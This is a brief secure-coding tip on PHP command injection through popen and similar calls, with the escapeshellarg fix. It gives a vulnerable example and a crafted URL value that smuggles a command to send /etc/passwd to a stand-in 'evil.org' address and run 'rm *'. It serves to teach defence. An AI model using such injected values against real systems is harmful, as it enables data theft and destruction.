  • 10. Calling External Programs Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands. <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);